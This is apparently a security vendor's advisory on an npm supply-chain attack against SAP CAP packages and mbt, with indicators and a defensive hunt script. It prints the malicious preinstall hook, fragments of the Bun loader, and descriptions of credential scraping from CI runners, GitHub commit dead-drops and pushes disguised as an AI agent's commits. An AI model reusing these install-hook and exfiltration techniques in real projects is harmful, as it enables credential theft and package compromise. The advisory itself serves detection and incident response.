
























A new npm supply-chain compromise is targeting the SAP developer ecosystem.
The affected packages we are tracking so far are:
- @cap-js/sqlite - v2.2.2
- @cap-js/postgres - v2.2.2
- @cap-js/db-service - v2.10.1
- mbt@1.2.48

The pattern is familiar but also a bit different: a trusted package receives a new preinstall hook, the hook runs a new setup.mjs file, and that loader downloads the Bun JavaScript runtime to execute a large obfuscated payload named execution.js.
The payload is an 11.7 MB credential stealer and propagation framework. It harvests local developer credentials, GitHub and npm tokens, GitHub Actions secrets, and cloud secrets from AWS, Azure, GCP, and Kubernetes. It then exfiltrates encrypted results through public GitHub repositories.
The malware names those repositories with a hardcoded description:
A Mini Shai-Hulud has Appeared
The compromised packages use npm lifecycle execution. In what we've seen so far, package.json was modified to add:

```json
"scripts": {
  "preinstall": "node setup.mjs"
}
```

That means the malicious code runs automatically during npm install, before the install has even completed.
The malicious package adds two files:
- setup.mjs
- execution.js

The normal package code still looks like the legitimate SAP package. In the @cap-js/sqlite@2.2.2 sample, the ordinary files match clean @cap-js/sqlite@2.2.1 byte-for-byte. The compromise is the install hook plus the added payload files.
A public lead points to a likely cause: an npm token exposed to pull request builds through CircleCI.
That lines up with what we found in SAP/cloud-mta-build-tool. On April 29, a short-lived draft PR titled feat: ci speedup was opened from gruposbftechrecruiter/harkonnen-navigator-149. The PR was closed within minutes and the branch was later force-pushed, leaving the current GitHub diff empty.
CircleCI still kept the important part. A PR build on pull/1223 checked out commit a959014aa7b7fc37a9b5730c951776e7db2920a6, which added a Bun loader at bin/config.mjs, added an obfuscated payload at bin/mbt.js, and changed the test command to:
```shell
node ./bin/config.mjs && node ./bin/mbt
```

That test ran in a PR job where CircleCI listed redacted project secrets, including CLOUD_MTA_BOT_NPM_TOKEN, CLOUD_MTA_BOT_GITHUB_TOKEN, CircleCI OIDC tokens, Docker Hub credentials, Cloud Foundry credentials, and other release-related variables.
The logs also showed Octokit warnings for POST https://api.github.com/user/repos, which matches the malware's GitHub exfiltration behavior.
This makes the CircleCI PR build the strongest lead for the initial credential theft.
The first stage, setup.mjs, is a Bun bootstrapper. It checks the operating system and architecture, downloads Bun 1.3.13 from GitHub when needed, extracts the binary, and uses Bun to run execution.js.
```javascript
const BUN_VERSION = '1.3.13';
const ENTRY_SCRIPT = 'execution.js';
const url = `https://github.com/oven-sh/bun/releases/download/bun-v${BUN_VERSION}/${asset}.zip`;
execFileSync(binPath, [entryScriptPath], { stdio: 'inherit', cwd: SCRIPT_DIR });
```

The second stage, execution.js, is a single large obfuscated payload. It uses a custom string scrambling layer labeled ctf-scramble-v2, checks whether it is running in CI, exits on Russian locale settings, and daemonizes itself on non-CI machines.
The payload is built to hit both developer laptops and CI/CD runners.
It attempts to collect:
- gh auth token
- .npmrc

The GitHub Actions path is especially concerning. The payload includes an embedded Python helper that searches /proc for the Runner.Worker process, reads its memory, and extracts masked secret structures from the runner.
The malware uses GitHub as its exfiltration channel.
The new propagation keyword is:
OhNoWhatsGoingOnWithGitHub

The malware searches GitHub commits for this string and uses matching commit messages as a token dead-drop. Commit messages matching OhNoWhatsGoingOnWithGitHub:<base64> are decoded into GitHub tokens and checked for repository access.
When the malware can create a repository, it uses randomized Dune-themed names, sets the repository description to:
A Mini Shai-Hulud has Appeared

and writes encrypted result files under:

results/results-<timestamp>-<counter>.json

The data is compressed and encrypted before commit using AES-256-GCM, with the AES key wrapped by an embedded RSA public key.

The payload contains logic for spreading through developer and release workflows.
In the analyzed samples, the malware checks for GitHub Actions release automation related to cap-js/cds-dbs. If it sees a release workflow in that repository context, it can modify a package tarball by:
- adding execution.js
- adding setup.mjs
- setting scripts.preinstall = "node setup.mjs"

It also attempts to use stolen GitHub Actions tokens to push files into repositories:
- .vscode/tasks.json
- .vscode/setup.mjs
- .claude/execution.js
- .claude/setup.mjs
- .claude/settings.json

Those commits use the message:

chore: update dependencies

with the author:

claude <claude@users.noreply.github.com>

The targeted packages sit in normal SAP development workflows. @cap-js/sqlite, @cap-js/postgres, and @cap-js/db-service are part of the SAP CAP database ecosystem, while mbt is used around SAP Cloud MTA build workflows.
That makes this campaign small in package count but potentially high impact. These packages are likely to run on developer machines and CI runners that have access to GitHub, npm, cloud credentials, and enterprise deployment secrets.
Search lockfiles, package caches, CI logs, internal registries, artifact stores, and developer machines for:
- @cap-js/sqlite - v2.2.2
- @cap-js/postgres - v2.2.2
- @cap-js/db-service - v2.10.1
- mbt@1.2.48
- setup.mjs
- execution.js
- preinstall scripts running node setup.mjs
- Bun 1.3.13 downloads during package installation

Search GitHub for OhNoWhatsGoingOnWithGitHub: https://github.com/search?q=OhNoWhatsGoingOnWithGitHub&type=commits

Also search for:

- A Mini Shai-Hulud has Appeared
- OhNoWhatsGoingOnWithGitHub
- chore: update dependencies
- claude <claude@users.noreply.github.com>
- .claude/ or .vscode/setup.mjs files
- results/results-*.json files in newly created public repositories

If any affected package was installed, rotate secrets. Do not limit rotation to npm tokens. The payload targets GitHub, npm, cloud providers, Kubernetes, CI secrets, and local developer tooling.
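As an added example (not code from Aikido or from the SAP projects), a small Python hunt script for the install-time indicators above: it flags the affected name/version pairs, lifecycle hooks that invoke setup.mjs, the dropped payload files sitting next to a package.json, and package-lock.json entries pinning an affected version. The fixture it builds is constructed here, with placeholder files standing in for the real payload.

```python
import json, pathlib, re, tempfile

# Name/version pairs the advisory lists as compromised.
AFFECTED = {("@cap-js/sqlite", "2.2.2"), ("@cap-js/postgres", "2.2.2"),
            ("@cap-js/db-service", "2.10.1"), ("mbt", "1.2.48")}
PAYLOAD_FILES = ("setup.mjs", "execution.js")
HOOK_RE = re.compile(r"\bsetup\.mjs\b")  # lifecycle hooks invoking the loader

def load_json(path):
    try:
        return json.loads(pathlib.Path(path).read_text())
    except (OSError, ValueError):  # unreadable or not JSON: nothing to report
        return {}

def scan_package_dir(pkg_dir):
    """Findings for one directory holding a package.json (installed package or project)."""
    pkg_dir = pathlib.Path(pkg_dir)
    meta, findings = load_json(pkg_dir / "package.json"), []
    if (meta.get("name"), meta.get("version")) in AFFECTED:
        findings.append(f"affected package {meta['name']}@{meta['version']}")
    for hook in ("preinstall", "install", "postinstall"):
        cmd = str((meta.get("scripts") or {}).get(hook, ""))
        if HOOK_RE.search(cmd):
            findings.append(f"{hook} hook runs setup.mjs: {cmd}")
    present = [f for f in PAYLOAD_FILES if (pkg_dir / f).is_file()]
    if present:
        findings.append("payload files present: " + ", ".join(present))
    return findings

def scan_lockfile(lock_path):
    """Findings from a package-lock.json (v2/v3 'packages' map) pinning an affected version."""
    findings = []
    for path, entry in (load_json(lock_path).get("packages") or {}).items():
        name = entry.get("name") or path.rsplit("node_modules/", 1)[-1]
        if (name, entry.get("version")) in AFFECTED:
            findings.append(f"lockfile pins {name}@{entry['version']}")
    return findings

def build_sample():
    """Constructed fixture mimicking the trojaned layout; placeholder files, not the real payload."""
    root = pathlib.Path(tempfile.mkdtemp())
    pkg = root / "node_modules" / "@cap-js" / "sqlite"
    pkg.mkdir(parents=True)
    (pkg / "package.json").write_text(json.dumps({"name": "@cap-js/sqlite", "version": "2.2.2",
                                                  "scripts": {"preinstall": "node setup.mjs"}}))
    for name in PAYLOAD_FILES:
        (pkg / name).write_text("// constructed placeholder\n")
    (root / "package-lock.json").write_text(json.dumps(
        {"lockfileVersion": 3, "packages": {"node_modules/@cap-js/sqlite": {"version": "2.2.2"}}}))
    return root
```

To cover a whole checkout or CI cache, call scan_package_dir on every directory under node_modules that contains a package.json (os.walk) and scan_lockfile on each package-lock.json you find.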
If you are an Aikido user, check your central feed and filter on malware issues. This will surface as a 100/100 critical issue. Aikido rescans nightly, but we recommend triggering a manual rescan now.
If you are not yet an Aikido user, you can create an account and connect your repos. Our malware coverage is included in the free plan, no credit card required.
For broader coverage across your whole team, Aikido's Endpoint Protection gives you visibility and control over the software packages installed on your team's devices. It covers browser extensions, code libraries, IDE plugins, and build dependencies, all in one place. Stop malware before it gets installed.
For future protection, consider Aikido Safe Chain (open source). Safe Chain sits in your existing workflow, intercepting npm, npx, yarn, pnpm, and pnpx commands and checking packages against Aikido Intel before install.
Affected packages:
- @cap-js/sqlite - v2.2.2
- @cap-js/postgres - v2.2.2
- @cap-js/db-service - v2.10.1
- mbt@1.2.48

Hashes from the analyzed @cap-js/sqlite@2.2.2 sample:

- setup.mjs: 4066781fa830224c8bbcc3aa005a396657f9c8f9016f9a64ad44a9d7f5f45e34
- execution.js: 6f933d00b7d05678eb43c90963a80b8947c4ae6830182f89df31da9f568fea95
- 29ac906c8bd801dfe1cb39596197df49f80fff2270b3e7fbab52278c24e4f1a7

Strings and markers:

- A Mini Shai-Hulud has Appeared
- OhNoWhatsGoingOnWithGitHub (propagation keyword / GitHub commit dead-drop marker)
- ctf-scramble-v2
- tmp.987654321.lock
- chore: update dependencies
- claude@users.noreply.github.com

URLs and endpoints:

- hxxps://github[.]com/oven-sh/bun/releases/download/bun-v1.3.13/
- hxxps://api.github[.]com/search/commits?q=OhNoWhatsGoingOnWithGitHub&sort=author-date&order=desc&per_page=50
- hxxp://169.254.169.254
- hxxp://169.254.170.2
- hxxp://[fd00:ec2::254]